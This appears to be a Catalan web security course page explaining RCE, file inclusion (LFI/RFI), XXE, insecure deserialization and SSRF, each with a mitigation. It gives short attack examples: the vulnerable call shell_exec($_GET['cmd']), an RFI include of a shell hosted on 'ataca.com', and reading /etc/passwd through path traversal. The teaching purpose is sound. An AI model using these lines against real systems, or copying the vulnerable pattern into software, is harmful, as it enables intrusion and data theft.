TEORIA · AMPLIACIÓ TÈCNICA

Mòdul 5: Vulnerabilitats Avançades

Aprofundiment en vulnerabilitats crítiques que permeten l'explotació real del sistema, des de l'execució de codi fins a la manipulació de peticions del servidor.

OWASP Top 10 Vulnerabilities
Recursos: OWASP Top 10 images/teoriaM03/owasp-top10.png
Llegir més: OWASP Top 10 Project
5.4

Execució Remota de Codi (RCE)

💻
L'atacant aconsegueix que el servidor executi ordres del sistema operatiu (bash/cmd).
⚠️

Funció perillosa

shell_exec($_GET['cmd']) — Permet l'execució directa d'inputs de l'usuari.

🐚

Web Shell

L'objectiu final de l'RCE. Es pot obtenir una interfície d'administració remota (com mitjançant un git clone d'un repositori de shells) per navegar pel sistema.

🛡️
Mitigació: Utilitzar escapeshellarg() o, millor encara, utilitzar Llistes Blanques (només permetre comandaments coneguts) en lloc de llistes negres, ja que un atacant sempre pot trobar variants per saltar-se les prohibicions.
Diagrama d'explotació RCE
Diagrama: Remote Code Execution images/teoriaM03/rce-exploit.png
Llegir més: Command Injection — owasp.org
5.5

Inclusió de Fitxers (LFI i RFI)

📂

LFI (Local File Inclusion)

L'atacant llegeix fitxers interns del servidor (ex: /etc/passwd) usant ../ (Path Traversal).

+
🌐

RFI (Remote File Inclusion)

L'atacant inclou un script allotjat en un servidor extern (ex: include('http://ataca.com/shell.php')).

⚙️
Requisit RFI: Requereix que allow_url_include estigui en On al fitxer php.ini.
☣️
Log Poisoning: Tècnica avançada d'LFI que consisteix a injectar codi PHP en un fitxer de log (enverinar-lo) per després incloure'l i executar-lo.
Diagrama LFI vs RFI
Diagrama: LFI vs RFI images/teoriaM03/lfi-rfi.png
Llegir més: File Path Traversal — portswigger.net
5.6

XML External Entities (XXE)

🧬

L'atac

S'aprofita de processadors XML mal configurats que permeten carregar entitats externes.

🎯

Conseqüència

Permet llegir fitxers interns o fer peticions des del servidor (SSRF).

💣

Billion Laughs

Tipus d'atac DoS mitjançant la recursió infinita d'entitats XML que consumeix tota la RAM del sistema.

Diagrama d'atac XXE
Diagrama: XML External Entity images/teoriaM03/xxe-attack.png
Llegir més: XXE Injection — portswigger.net
5.7

Deserialització Insegura

🔄
Risc: Convertir dades de l'usuari en objectes de programació sense cap tipus de validació prèvia.

L'explotació d'aquesta vulnerabilitat pot portar a un RCE si l'objecte té mètodes "màgics" com __destruct() o __wakeup().

Solució: No utilitzar unserialize() amb dades que vinguin directament del client; és recomanable usar format JSON.
Diagrama de Deserialització Insegura
Diagrama: Insecure Deserialization images/teoriaM03/insecure-deserialization.jpg
Llegir més: Insecure Deserialization — portswigger.net
5.8

Server-Side Request Forgery (SSRF)

🎭

El truc

Enganyar el servidor perquè faci una petició a la seva pròpia xarxa interna, allà on l'atacant no té accés directe des de l'exterior.

☁️

Objectiu típic

Accedir a les metadades de la màquina en entorns Cloud com AWS o Google Cloud per obtenir tokens de seguretat.

Diagrama d'atac SSRF
Diagrama: Server-Side Request Forgery images/teoriaM03/SSRF_Attack.svg
Llegir més: SSRF Injection — portswigger.net

🗂️ Resum: Vulnerabilitats d'Explotació

RCE Execució d'ordres del sistema. Solució: escapeshellarg() o evitar crides al SO.
LFI / RFI Inclusió de fitxers locals o remots. Requereix allow_url_include=On per a RFI.
XXE Entitats externes XML. Pot portar a lectura de fitxers, SSRF o DoS (Billion Laughs).
Deserialització Objectes sense validar. Perill en mètodes màgics. Millor usar JSON.
SSRF Peticions des del servidor cap a la seva xarxa interna (Metadades Cloud).